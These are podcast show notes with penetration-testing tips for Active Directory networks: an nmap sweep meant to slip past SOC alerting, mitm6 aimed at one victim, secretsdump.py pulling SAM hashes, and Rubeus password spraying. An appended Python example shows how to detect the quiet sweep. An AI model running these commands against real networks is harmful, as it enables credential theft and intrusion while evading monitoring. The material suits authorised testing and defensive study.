
7MS #514: Tales of Pentest Pwnage - Part 34
Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:

- I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
- Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
- Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 local:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after local - it's intentional, NOT an error!
- Rubeus makes spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain users and you might get even more gold!
- LDAPS relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it
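A defender-side note on the "quieter" scan tip: trimming the port list to four ports does nothing about the fact that the sweep still touches every host in the /24, so a detector keyed on distinct destinations per source (rather than on ports per host) still catches it. This is an added example, not code from the 7MS show notes; the log format is a constructed three-column "src dst dport" record and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample connection records (not real traffic): "src dst dport".
# 10.0.0.5 is a normal client talking to a few servers; 10.0.0.99 sweeps a /24
# on the same small port set the "quiet" nmap tip above uses.
SAMPLE_LOG = (
    ["10.0.0.5 10.0.1.10 443"] * 40
    + ["10.0.0.5 10.0.1.11 80", "10.0.0.5 10.0.1.12 8080"]
    + [f"10.0.0.99 10.0.1.{h} {p}"
       for h in range(1, 255) for p in (80, 443, 8000, 8080)]
)


def parse(line):
    """Split one constructed log record into (src, dst, dport)."""
    src, dst, port = line.split()
    return src, dst, int(port)


def horizontal_scanners(lines, min_hosts=32, max_ports=16):
    """Return {src: (distinct_hosts, sorted_ports)} for every source that
    touched at least min_hosts distinct destinations while using at most
    max_ports distinct ports. A low port count is exactly what a "quiet"
    sweep looks like, so the host count, not the port count, is the signal.
    Thresholds are assumed values; tune them to the network's baseline."""
    hosts = defaultdict(set)
    ports = defaultdict(set)
    for line in lines:
        src, dst, port = parse(line)
        hosts[src].add(dst)
        ports[src].add(port)
    return {
        src: (len(hosts[src]), sorted(ports[src]))
        for src in hosts
        if len(hosts[src]) >= min_hosts and len(ports[src]) <= max_ports
    }


if __name__ == "__main__":
    for src, (n_hosts, port_list) in horizontal_scanners(SAMPLE_LOG).items():
        print(f"{src}: {n_hosts} hosts on ports {port_list}")
```

The client that hits one server forty times is not flagged, while the source that touches 254 hosts on four ports is, which is the inverse of a per-host port-count rule.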